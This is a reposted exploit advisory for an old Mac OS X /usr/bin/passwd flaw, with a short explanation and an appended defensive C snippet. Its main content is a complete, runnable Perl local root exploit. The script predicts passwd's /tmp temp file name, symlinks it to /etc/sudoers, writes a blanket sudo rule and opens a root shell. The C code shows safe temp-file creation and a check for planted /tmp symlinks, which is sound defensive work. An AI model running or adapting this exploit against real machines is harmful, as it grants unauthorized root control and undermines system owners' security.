[MacOSX] "/usr/bin/passwd" Binary Local Privilege Escalation (root) Exploit

#!/usr/bin/perl
#
# /usr/bin/passwd[OSX]: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywhere on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l ".
# the second issue is once a successful password change has occurred
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp., which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)

use POSIX;

$fake_passwd="/tmp/xpasswd.$$";
# passwd's temp file name is derived from its pid, which is predicted as
# the next pid after this script's own.
$passwd_pid=($$ + 1);
$passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
$sudoers="/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
open(FP,">$fake_passwd")||pexit("couldn't open/write to $fake_passwd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);

This is a Mac OS X security vulnerability; it has been tested on Tiger 10.4.3. Any ordinary user who runs this Perl script obtains root. The presumed behaviour is that when a Mac user changes a password with passwd in Terminal, passwd -u writes the password into the correct database according to the database format the user specified. It first creates a temporary swap file under /tmp, and this script swaps that file out at exactly that moment, so the user can then switch to root with sudo.
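As an added defensive illustration (not part of the original post or the exploit author's code), the C functions below show the two properties the vulnerable passwd lacked when writing its /tmp scratch copy (an unpredictable name created atomically, and a fixed-name open that refuses an existing entry or a symlink), plus a check an investigator can run over /tmp for planted links pointing outside it. The directory and link-target names used when exercising it are constructed, not taken from a real host.

```c
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Safe scratch file: mkstemp picks an unguessable name and creates it
 * atomically (O_CREAT|O_EXCL), so a link planted under a predicted name
 * such as /tmp/.pwtmp.<pid> is never reused. `out` receives the path. */
int open_scratch(const char *dir, char *out, size_t outlen) {
    if (snprintf(out, outlen, "%s/.pwtmp.XXXXXX", dir) >= (int)outlen) return -1;
    return mkstemp(out);
}

/* If a fixed name is unavoidable, fail closed: O_EXCL rejects any existing
 * entry (a symlink counts, even a dangling one) and O_NOFOLLOW refuses to
 * traverse a link in the final component. Returns -1 with errno set. */
int open_fixed_name(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Detection: count symlinks in `dir` whose target lies outside `dir`.
 * The planted /tmp/.pwtmp.<pid> -> /etc/sudoers link is exactly such an
 * entry. Returns -1 if the directory cannot be read. */
int count_escaping_symlinks(const char *dir) {
    DIR *d = opendir(dir);
    if (d == NULL) return -1;
    int n = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char p[PATH_MAX], target[PATH_MAX];
        struct stat st;
        snprintf(p, sizeof p, "%s/%s", dir, e->d_name);
        if (lstat(p, &st) != 0 || !S_ISLNK(st.st_mode)) continue;
        ssize_t len = readlink(p, target, sizeof target - 1);
        if (len < 0) continue;
        target[len] = '\0';
        /* absolute target not under dir, or a relative one climbing out */
        if ((target[0] == '/' && strncmp(target, dir, strlen(dir)) != 0) ||
            strstr(target, "..") != NULL)
            n++;
    }
    closedir(d);
    return n;
}
```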

Source:
Apple Mac OS X "/usr/bin/passwd" Binary Local Privilege Escalation (root) Exploit
